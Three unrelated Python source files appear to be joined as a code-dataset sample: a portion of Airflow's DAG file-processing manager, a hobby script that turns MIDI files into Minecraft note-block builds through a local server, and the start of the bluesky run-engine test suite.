def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
running_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
Stats.decr('dag_processing.processes')
now = timezone.utcnow()
finished_processors[file_path] = processor
stat = DagFileStat(
len(processor.result[0]) if processor.result is not None else 0,
processor.result[1] if processor.result is not None else -1,
now,
(now - processor.start_time).total_seconds(),
self.get_run_count(file_path) + 1,
)
self._file_stats[file_path] = stat
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result[0]:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self._parsing_start_time = timezone.utcnow()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, stat in self._file_stats.items()
if stat.run_count == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path, self._zombies)
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._heartbeat_count += 1
return simple_dags
@provide_session
def _find_zombies(self, session):
"""
        Find zombie task instances, which are tasks that haven't heartbeated
        for too long, and update the current zombie list.
"""
now = timezone.utcnow()
zombies: List[SimpleTaskInstance] = []
if not self._last_zombie_query_time or \
(now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
# to avoid circular imports
from airflow.jobs import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
limit_dttm = timezone.utcnow() - timedelta(
seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
tis = (
session.query(TI)
.join(LJ, TI.job_id == LJ.id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
).all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti in tis:
sti = SimpleTaskInstance(ti)
self.log.info(
"Detected zombie job with dag_id %s, task_id %s, and execution date %s",
sti.dag_id, sti.task_id, sti.execution_date.isoformat())
zombies.append(sti)
self._zombies = zombies
def _kill_timed_out_processors(self):
"""
        Kill any file processors that time out, to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
file_path, processor.pid, processor.start_time.isoformat())
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
                # TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._heartbeat_count < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if child_processes:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
def emit_metrics(self):
"""
        Emit metrics about the DAG parsing summary.
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge('dag_processing.import_errors',
sum(stat.import_errors for stat in self._file_stats.values()))
# TODO: Remove before Airflow 2.0
Stats.gauge('collect_dags', parse_time)
Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
|
noteblocker.py
|
import os
import sys
import time
import shutil
import subprocess
import threading
import traceback
import math
import json
def pip_import(module, pipname=None):
pipname = pipname or module
try:
globals()[module] = __import__(module)
except ImportError:
print("ERROR: could not load module " + module + " [" + pipname + "]")
print("you need to install it yourself by running:")
print("python -m pip install " + pipname)
input()
pip_import("mido")
pip_import("requests")
class PathManager:
def __init__(self, root=None):
self.base_location = root or os.path.dirname(os.path.realpath(__file__))
def get_path(self, path, *args):
if ''.join(path if isinstance(path, list) else [path]).startswith('$'):
return os.path.join(self.base_location, *([path.split('/')[0][1:]] + path.split('/')[1:] + list(args)))
return os.path.join(*path.split('/') + list(args))
def assert_directory(self, path):
path = self.get_path(path)
if (not os.path.isdir(path)):
os.makedirs(path)
def default_file(self, path, content):
path = self.get_path(path)
self.assert_directory(os.path.dirname(path))
if not os.path.isfile(path):
file = open(path, 'w')
file.write(content)
file.close()
def get_json(self, path, mode='r'):
file = open(self.get_path(path), mode)
content = json.loads(file.read())
file.close()
return content
def set_json(self, path, content, mode='w'):
output = json.dumps(content)
file = open(self.get_path(path), mode)
file.write(output)
file.close()
def read_file(self, path, mode='r'):
file = open(self.get_path(path), mode)
content = file.read()
file.close()
return content
def set_file(self, path, content, mode='w'):
file = open(self.get_path(path), mode)
file.write(content)
file.close()
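# Sketch of the path convention used throughout this script (the file names are
# assumptions): a leading "$" anchors the path at this script's directory, any
# other path is returned as a plain relative path.
def _example_paths():
    pm = PathManager()
    anchored = pm.get_path("$config/settings.json")  # <script dir>/config/settings.json
    relative = pm.get_path("data/notes.json")        # data/notes.json, unchanged
    return anchored, relative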
class FilePathInputManager:
def __init__(self):
self.tkinter = None
self.filedialog = None
try:
self.tkinter = __import__("tkinter")
self.filedialog = __import__("tkinter.filedialog")
except:
pass
def get(self):
if self.tkinter == None or self.filedialog == None:
return self.get_fallback()
self.tk = self.tkinter.Tk()
self.tk.withdraw()
while True:
file = self.tkinter.filedialog.askopenfilename(filetypes=[('MIDI Files', ('.midi', '.mid'))])
            if file:  # askopenfilename returns '' when the dialog is cancelled
self.tk.destroy()
return file
def get_fallback(self):
print("enter a file path")
while True:
file = input()
if os.path.isfile(file):
break
return file
class MidiTranslationManager:
blocks = {
"bass": "oak_planks",
"snare": "sand",
"hat": "glass",
"basedrum": "stone",
"bell": "gold_block",
"flute": "clay",
"chime": "packed_ice",
"guitar": "white_wool",
"xylophone": "bone_block",
"piano": "iron_block"
}
midi = {
"0,1,2,3,4,5,6": "piano",
"7,8": "guitar",
"9,10,11,12": "chime",
"13,14": "xylophone",
"15": "bell",
"16": "guitar",
"25,26,27,28,29,30,31,21": "guitar",
"33,34,35,36": "bass",
"37,38": "basedrum",
"39,40": "bass",
"113": "bell",
"114": "hat",
"115": "basedrum",
"116": "hat",
"117": "snare",
"118": "basedrum",
"119": "snare"
}
channel10 = {
"27": "basedrum",
"28": "snare",
"29": "hat",
"30": "snare",
"31": "hat",
"32": "hat",
"33": "hat",
"34": "bell",
"35": "basedrum",
"36": "hat",
"37": "hat",
"38": "snare",
"39": "hat",
"40": "snare",
"41": "basedrum",
"42": "hat",
"43": "basedrum",
"44": "snare",
"45": "basedrum",
"46": "hat",
"47": "basedrum",
"48": "basedrum",
"49": "snare",
"50": "snare",
"51": "snare",
"52": "hat",
"53": "bell",
"54": "snare",
"55": "snare",
"56": "bell",
"57": "snare",
"58": "snare",
"59": "snare",
"60": "snare",
"61": "snare",
"62": "snare",
"63": "snare",
"64": "snare",
"65": "hat",
"66": "hat",
"67": "hat",
"67": "hat",
"68": "hat",
"69": "hat",
"70": "hat",
"71": "bell",
"72": "bell",
"73": "hat",
"74": "basedrum",
"75": "hat",
"76": "hat",
"77": "hat",
"78": "snare",
"79": "snare",
"80": "bell",
"81": "bell",
"82": "hat",
"83": "snare",
"84": "chime",
"85": "hat",
"86": "basedrum",
"87": "basedrum"
}
def get_percussion(instrument):
instrument = str(instrument)
for x in MidiTranslationManager.channel10:
if x == instrument or ("," + instrument + ",") in x or x.startswith(instrument + ",") or x.endswith("," + instrument):
return MidiTranslationManager.channel10[x]
return "piano"
def get_instrument(instrument):
instrument = str(instrument)
for x in MidiTranslationManager.midi:
if x == instrument or ("," + instrument + ",") in x or x.startswith(instrument + ",") or x.endswith("," + instrument):
return MidiTranslationManager.midi[x]
return "piano"
def get_block(instrument):
return MidiTranslationManager.blocks[instrument]
def note_block_pitch(midipitch):
pitch = midipitch - 54
while pitch < 0:
pitch += 12
while pitch > 24:
pitch -= 12
return pitch
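# Quick illustration of the translation tables above: MIDI pitch 66 falls into
# the two-octave note block range as pitch 12, and the "bell" instrument is
# built on top of a gold block.
def _example_translation():
    pitch = MidiTranslationManager.note_block_pitch(66)  # -> 12
    block = MidiTranslationManager.get_block("bell")     # -> "gold_block"
    return pitch, block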
class NoteBlockMessage:
def __init__(self, note, instrument, leading_delay, delay):
self.instrument = instrument
self.note = note
self.leading_delay = leading_delay
self.delay = delay
self.is_percussion = False
class NoteBlockConverter:
def __init__(self, fp):
self.midi = mido.MidiFile(fp)
self.midi_messages = []
self.noteblock = []
self.tempo_modifier = 1.0
self.channel10 = True
def extract_messages(self):
for message in self.midi:
self.midi_messages.append(message)
def generate_noteblock_objects(self):
channel_instrument = {}
total_delay = 0.0
output = []
for message in self.midi_messages:
if message.is_meta:
continue
if message.type == "program_change":
channel_instrument[message.channel] = message.program
if message.type in ["note_on", "note_off"]:
instrument = channel_instrument[message.channel] if message.channel in channel_instrument else 0
nbm = NoteBlockMessage(message.note if message.type == "note_on" else None, instrument, total_delay, message.time)
if message.channel == 9 and self.channel10:
nbm.is_percussion = True
output.append(nbm)
try:
total_delay += message.time / self.tempo_modifier
except:
pass
block_groups = [[]]
for message in output:
if len(block_groups[-1]) != 0:
if message.leading_delay != block_groups[-1][-1].leading_delay:
block_groups.append([])
block_groups[-1].append(message)
self.noteblock = block_groups
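# Minimal end-to-end sketch (the MIDI file name is an assumption): parse a MIDI
# file and group its note messages into frames of simultaneous notes.
def _example_convert(midi_path="song.mid"):
    converter = NoteBlockConverter(midi_path)
    converter.extract_messages()
    converter.generate_noteblock_objects()
    return converter.noteblock  # list of frames, each a list of NoteBlockMessage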
class NoteBlockLane:
def __init__(self):
self.objects = []
def add_repeater(self, ticks):
add = ticks
if len(self.objects) > 0:
if self.objects[-1][0] == "repeater": # stack up ticks instead of adding a bunch of 1 tick repeaters
total = self.objects[-1][1] + ticks
self.objects[-1][1] = min([total, 4])
add = max([total - 4, 0])
if add == 0:
return
self.objects.append(["repeater", add])
def add_blocks(self, blocks):
self.objects.append(["blocks", blocks])
def add_stud(self):
self.objects.append(["stud", None])
class NoteBlockStructureGenerator:
def __init__(self, noteblockmessages):
self.messages = noteblockmessages
self.structures = []
self.command_delay = 0.0
self.server_instance = None
self.line1 = "black_wool"
self.line2 = "black_wool"
self.studs = ["red_wool", "orange_wool", "yellow_wool", "lime_wool", "light_blue_wool", "cyan_wool", "blue_wool", "purple_wool", "magenta_wool"]
self.facing = {
0: "south",
1: "west",
2: "north",
3: "east"
}
def generate(self):
biggest_frame = max([len([y for y in x if y.note != None]) for x in self.messages])
lanes = [NoteBlockLane() for x in range(0, math.ceil(biggest_frame / 3))]
time = -0.1
current_items = [item for sublist in self.messages.copy() for item in sublist]
current_items = [item for item in current_items if item.note != None]
max_time = max([item.leading_delay for item in current_items])
while not (time > max_time):
time += 0.1
tick = []
for x in current_items:
if time > x.leading_delay and x.note != None:
tick.append(x)
lane_number = 0
notes_lanes = [tick[x:x+3] for x in range(0, len(tick), 3)]
if len(notes_lanes) != 0:
for x in range(0, len(lanes)):
if x >= len(notes_lanes):
lanes[x].add_stud()
continue
lanes[x].add_blocks(notes_lanes[x])
for x in tick:
current_items.remove(x)
for x in lanes:
x.add_repeater(1)
self.structures = lanes
def place_block(self, x, y, z, block):
#print("setblock %s %s %s %s" % (x, y, z, block))
self.server_instance.send_command("setblock %s %s %s %s" % (x, y, z, block))
time.sleep(self.command_delay)
def build(self, server_instance, x_pos, y_pos, z_pos, direction):
print('direction is ' + str(direction))
self.server_instance = server_instance
forward_x = 0 if direction % 2 == 0 else direction - 2
forward_z = 0 if direction % 2 != 0 else 2 - direction - 1
sideways_x = 0 - forward_z if direction % 2 == 0 else forward_z
sideways_z = 0 - forward_x if direction % 2 == 0 else forward_x
border_x = x_pos
border_z = z_pos
x_pos += sideways_x * 2
z_pos += sideways_z * 2
max_entries = max([len(x.objects) for x in self.structures])
for x in range(0, max_entries):
current_border_x = border_x + forward_x * x
current_border_z = border_z + forward_z * x
current_x = x_pos + forward_x * x
current_z = z_pos + forward_z * x
self.place_block(current_border_x, y_pos + 2, current_border_z, self.line1)
self.place_block(current_border_x + sideways_x * len(self.structures) * 3 + sideways_x, y_pos + 2, current_border_z + sideways_z * len(self.structures) * 3 + sideways_z, self.line2)
self.place_block(current_border_x, y_pos + 1, current_border_z, self.line1)
self.place_block(current_border_x + sideways_x * len(self.structures) * 3 + sideways_x, y_pos + 1, current_border_z + sideways_z * len(self.structures) * 3 + sideways_z, self.line2)
for y in range(0, len(self.structures)):
lane = self.structures[y]
lane_x = current_x + sideways_x * 3 * y
lane_z = current_z + sideways_z * 3 * y
if x < len(lane.objects):
item = lane.objects[x]
if (item[0] == "repeater"):
self.place_block(lane_x, y_pos + 1, lane_z, "iron_block")
self.place_block(lane_x, y_pos + 2, lane_z, "repeater[facing=%s,delay=%s]" % (self.facing[direction], item[1]))
if (item[0] == "stud"):
self.place_block(lane_x, y_pos + 2, lane_z, self.studs[(math.floor(x / 2) + y) % len(self.studs)])
if (item[0] == "blocks"):
start_x = lane_x
start_z = lane_z
if len(item[1]) > 1:
start_x = start_x + sideways_x * -1
start_z = start_z + sideways_z * -1
for z in item[1]:
inst = MidiTranslationManager.get_instrument(z.instrument) if not z.is_percussion else MidiTranslationManager.get_percussion(z.note)
note = z.note if not z.is_percussion else 48
pitch = MidiTranslationManager.note_block_pitch(note)
material = MidiTranslationManager.get_block(inst)
if material in ["sand", "gravel"]:
self.place_block(start_x, y_pos, start_z, "iron_block")
self.place_block(start_x, y_pos + 1, start_z, material)
self.place_block(start_x, y_pos + 2, start_z, "note_block[note=" + str(pitch) + ("," + "instrument=" + inst if inst != "piano" else "") + "]")
start_x = start_x + sideways_x
start_z = start_z + sideways_z
class MinecraftServerWrapper:
def __init__(self):
self.path_manager = PathManager()
self.server_process = None
self.server_logs = []
self.output_thread = None
self.remake_flat = False
self.server_ready = False
self.logging_paused = False
self._logging_paused = False
self.logging_disabled = False
self.pause_queue = []
if not os.path.isfile(self.path_manager.get_path("$minecraft_server_1.13.1.jar")):
print("[s] downloading minecraft server...")
server_jar = requests.get(r"https://launcher.mojang.com/v1/objects/fe123682e9cb30031eae351764f653500b7396c9/server.jar")
if server_jar.status_code == 200:
server_file = open(self.path_manager.get_path("$minecraft_server_1.13.1.jar"), "wb")
server_file.write(server_jar.content)
server_file.close()
print("[s] done!")
else:
print("[s] error: bad response")
eula_file = open(self.path_manager.get_path("$eula.txt"), "w")
eula_file.write("eula=true")
eula_file.close()
def server_output_thread(self):
while self.server_process == None:
time.sleep(1)
for line in iter(self.server_process.stdout.readline, b''):
if self.logging_paused and not self._logging_paused:
self.pause_queue = []
self._logging_paused = True
if not self.logging_paused and self._logging_paused:
self._logging_paused = False
if not self.logging_disabled:
for x in self.pause_queue:
self.server_logs.append(x)
self.on_server_log(x)
if not self.logging_disabled:
self.server_logs.append(line)
self.on_server_log(line)
self.on_server_close()
def send_command(self, text):
self.server_process.stdin.writelines([text.encode() + b'\r'])
self.server_process.stdin.flush()
def get_log_output(self, text):
t = text.split(']', 1)
if len(t) < 2:
return text
return t[-1][2:].strip('\n').replace('\r', '')
def on_server_log(self, text):
self.log_event(self, text)
compare_text = self.get_log_output(text.decode())
if compare_text.startswith('Done (') and compare_text.endswith(')! For help, type "help"'):
propreties = open(self.path_manager.get_path("$server.properties"), "r")
            is_flat = True in [False if (x.startswith('#') or x.strip() == "") else (False if x.split('=', 1)[0] != "level-type" else (x.split('=', 1)[1].strip().lower() == "flat")) for x in propreties.readlines()]
propreties.close()
if not is_flat:
print('[s] world is not flat type. fixing..')
self.remake_flat = True
self.send_command("stop")
else:
self.server_ready = True
def log_event(self, me, text):
print(text.decode(), end="")
sys.stdout.flush()
def on_server_close(self):
print('[s] server closed!')
if self.remake_flat == True:
time.sleep(2)
self.server_process.terminate()
shutil.rmtree(self.path_manager.get_path("$world"))
propreties = open(self.path_manager.get_path("$server.properties"), "r")
lines = propreties.readlines()
propreties.close()
propreties = open(self.path_manager.get_path("$server.properties"), "w")
propreties.writelines([x if (x.startswith('#') or x.strip() == "") else (x if x.split('=', 1)[0] != "level-type" else ("level-type=FLAT\n")) for x in lines])
propreties.close()
self.start_server()
def start_server(self):
self.server_process = None
self.server_logs = []
self.output_thread = None
self.remake_flat = False
self.server_ready = False
if not os.path.isfile(self.path_manager.get_path("$minecraft_server_1.13.1.jar")):
return
self.output_thread = threading.Thread(target=self.server_output_thread)
self.output_thread.start()
startup = subprocess.STARTUPINFO()
startup.dwFlags |= subprocess.STARTF_USESHOWWINDOW
print('[s] starting server..')
self.server_process = subprocess.Popen(["java", "-Xmx1G", "-Xms1G", "-jar", self.path_manager.get_path("$minecraft_server_1.13.1.jar"), "nogui"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=startup)
class NoteblockerCI:
def __init__(self):
self.minecraft_server = MinecraftServerWrapper()
self.minecraft_server.log_event = self.log_event
self.repeaterfix = True
self.pythonw = "pythonw" in os.path.split(sys.executable)[1]
self.tempo_modifier = 1.0
self.channel10 = True
self.facing_repeaterfix = {
0: "north",
1: "east",
2: "south",
3: "west"
}
def log_event(self, me, text):
if len(me.server_logs) == 0:
print()
print(text.decode(), end="")
sys.stdout.flush()
def ready_server(self):
self.minecraft_server.start_server()
print('waiting for server', end="")
while True:
if len(self.minecraft_server.server_logs) == 0:
print(".", end="")
time.sleep(1)
if self.minecraft_server.server_ready:
break
def try_get_arg(self, argslist, index, atype):
try:
return atype(argslist[index])
except:
return None
def input_if_none(self, arg, argname, reqtype):
if arg != None:
return arg
return self.input_arg(argname, reqtype)
def input_arg(self, name, reqtype):
try:
typename = type(reqtype()).__name__
except:
typename = str(reqtype)
while True:
a = input("enter " + str(name) + ": ")
try:
return reqtype(a)
except:
print("please enter a" + ("n" if typename[0] in "aeiou" else "") + " " + typename.upper())
def console(self):
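        # Simple REPL: read a line from stdin, dispatch it via
        # process_command(), and keep going until Ctrl+C; on exit, try to stop
        # the Minecraft server cleanly.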
if self.pythonw:
print("warning: console inputs do not work properly in idle or other windowed environments. disabling server log.")
self.minecraft_server.logging_disabled = True
print('welcome to the noteblocker console! for help try ?')
while True:
try:
print('> ', end="")
sys.stdout.flush()
q = sys.stdin.readline()
sys.stdout.flush()
except KeyboardInterrupt:
break
try:
self.process_command(q)
except KeyboardInterrupt:
continue
except BaseException as e:
print('an error occurred while executing this command')
print("\n".join(traceback.format_exception(type(e), e, e.__traceback__)))
print('kthxbai')
try:
self.minecraft_server.send_command("")
self.minecraft_server.send_command("stop")
except:
pass
def process_command(self, q):
if q.strip() == "":
return
command = q.strip().split()
if q.strip() == "?":
print("/command - starting a command with / executes a minecraft server side command e.g. /op <player>")
print("nbgen (x) (y) (z) (direction - north/east/south/west) - generates a noteblock sequence. a path will be prompted later. you can if you want but do not need to provide coords/direction. make sure that area of the world is loaded!")
print("repeaterfix <on/off> - in 1.13.1 there is a bug that causes repeaters to place facing the wrong direction. this toggles a fix for this. [on by default]")
print("tempomod (float) - edits the tempo modifier [default 1.0]")
if q.strip().startswith('/'):
self.minecraft_server.send_command(q.strip()[1:])
if command[0] == "repeaterfix":
on = self.try_get_arg(command, 1, str)
if on == None:
                print('repeaterfix is ' + ('on.' if self.repeaterfix else 'off.'))
return
if not (on.strip().lower() in ['on', 'off']):
print('please provide ON or OFF.')
return
self.repeaterfix = on.strip().lower() == 'on'
print("changed the state of repeaterfix.")
if command[0] == "tempomod":
mod = self.try_get_arg(command, 1, float)
if mod == None:
print('the tempo modifier is ' + str(self.tempo_modifier))
return
self.tempo_modifier = mod
print("changed the tempo modifier to " + str(self.tempo_modifier))
if command[0] == "nbgen":
x = self.try_get_arg(command, 1, int)
y = self.try_get_arg(command, 2, int)
z = self.try_get_arg(command, 3, int)
direction = self.try_get_arg(command, 4, str)
if not direction in ["north", "east", "south", "west"]:
direction = None
m = FilePathInputManager()
print('please choose a path (if not prompted below, look for a file window)')
midipath = m.get()
if not os.path.isfile(midipath):
print("invalid path")
return
x = self.input_if_none(x, "x position", int)
y = self.input_if_none(y, "y position", int)
z = self.input_if_none(z, "z position", int)
while True:
if direction in ['north', 'south', 'east', 'west']:
break
print('input a direction (north/south/east/west)')
direction = input('> ').strip().lower()
direction = {'south': 0, 'west': 1, 'north': 2, 'east': 3}[direction]
print('reading file..')
c = NoteBlockConverter(midipath)
c.tempo_modifier = self.tempo_modifier
print('extracting file')
c.extract_messages()
print('generating notes')
c.generate_noteblock_objects()
g = NoteBlockStructureGenerator(c.noteblock)
if (self.repeaterfix):
g.facing = self.facing_repeaterfix
print('generating structure')
g.generate()
print('starting minecraft server')
print('building blocks..')
self.minecraft_server.logging_disabled = True
try:
g.server_instance = self.minecraft_server
g.place_block(x, y + 3, z, "lapis_block")
rotation = (direction + 2) % 4 * 4
filename = os.path.split(midipath)[1]
filename_chunked = [filename[x:x+14] for x in range(0, len(filename), 14)]
while len(filename_chunked) < 4:
filename_chunked.append("")
                filename_chunked = filename_chunked[0:4]
g.place_block(x, y + 4, z,r"""minecraft:sign[rotation=%s]{Text1:"{\"text\":\"%s\",\"color\":\"blue\"}",Text2:"{\"text\":\"%s\",\"color\":\"blue\"}",Text3:"{\"text\":\"%s\",\"color\":\"blue\"}",Text4:"{\"text\":\"%s\",\"color\":\"blue\"}"}""" % tuple([rotation] + filename_chunked))
g.build(self.minecraft_server, x, y, z, direction)
except BaseException as e:
time.sleep(2)
if not self.pythonw:
self.minecraft_server.logging_disabled = False
raise e
time.sleep(2)
if not self.pythonw:
self.minecraft_server.logging_disabled = False
print('done!!')
def run(self):
self.ready_server()
self.console()
a = NoteblockerCI()
a.run()
|
test_run_engine.py
|
from event_model import DocumentNames
import threading
import types
import os
import signal
import sys
from collections import defaultdict
import time as ttime
import pytest
from bluesky.tests import requires_ophyd
from bluesky.run_engine import (RunEngineStateMachine,
TransitionError, IllegalMessageSequence,
NoReplayAllowed, FailedStatus,
RunEngineInterrupted,
RequestStop,
RequestAbort)
from bluesky import Msg
from functools import partial
from bluesky.tests.utils import MsgCollector, DocCollector
from bluesky.plans import (count, grid_scan)
from bluesky.plan_stubs import (abs_set, trigger_and_read, checkpoint)
from bluesky.preprocessors import (finalize_wrapper, run_decorator,
reset_positions_decorator,
run_wrapper, rewindable_wrapper,
subs_wrapper, baseline_wrapper,
SupplementalData)
from .utils import _fabricate_asycio_event
def test_states():
assert RunEngineStateMachine.States.states() == ['idle',
'running',
'pausing',
'paused',
'halting',
'stopping',
'aborting',
'suspending',
'panicked',
]
def test_panic_trap(RE):
RE._state = 'panicked'
for k in RunEngineStateMachine.States.states():
if k != 'panicked':
with pytest.raises(TransitionError):
RE._state = k
def test_state_is_readonly(RE):
with pytest.raises(AttributeError):
RE.state = 'running'
@pytest.mark.parametrize("deferred_pause_delay, is_pause_set", [
(None, False), # Do not pause
(0.1, False), # Pause before the checkpoint
(1.4, True), # Pause after the checkpoint
])
def test_deferred_pause_requested(RE, deferred_pause_delay, is_pause_set):
"""
Test for ``deferred_pause_requested``.
"""
assert RE.deferred_pause_requested is False
plan = [Msg("sleep", None, 1), Msg("checkpoint"), Msg("sleep", None, 1)]
pause_req_immediate = None
def _pause():
# This function is requesting the deferred pause and reads the property
nonlocal pause_req_immediate
RE.request_pause(defer=True)
ttime.sleep(0.1)
pause_req_immediate = RE.deferred_pause_requested
t = None
if deferred_pause_delay is not None:
t = threading.Timer(deferred_pause_delay, _pause)
t.start()
try:
RE(plan)
except Exception:
pass
if deferred_pause_delay is not None:
assert pause_req_immediate is True
assert RE.deferred_pause_requested is is_pause_set
def test_verbose(RE, hw):
RE.verbose = True
assert RE.verbose
# Emit all four kinds of document, exercising the logging.
RE([Msg('open_run'), Msg('create', name='primary'), Msg('read', hw.det),
Msg('save'),
Msg('close_run')])
def test_reset(RE):
with pytest.raises(RunEngineInterrupted):
RE([Msg('open_run'), Msg('pause')])
assert len(RE._run_bundlers) > 0
RE.reset()
assert len(RE._run_bundlers) == 0
def test_running_from_paused_state_raises(RE):
with pytest.raises(RunEngineInterrupted):
RE([Msg('pause')])
assert RE.state == 'paused'
with pytest.raises(RuntimeError):
RE([Msg('null')])
RE.resume()
assert RE.state == 'idle'
RE([Msg('null')])
def test_resuming_from_idle_state_raises(RE):
with pytest.raises(RuntimeError):
RE.resume()
with pytest.raises(RunEngineInterrupted):
RE([Msg('pause')])
assert RE.state == 'paused'
RE.resume()
assert RE.state == 'idle'
with pytest.raises(RuntimeError):
RE.resume()
def test_stopping_from_idle_state_raises(RE):
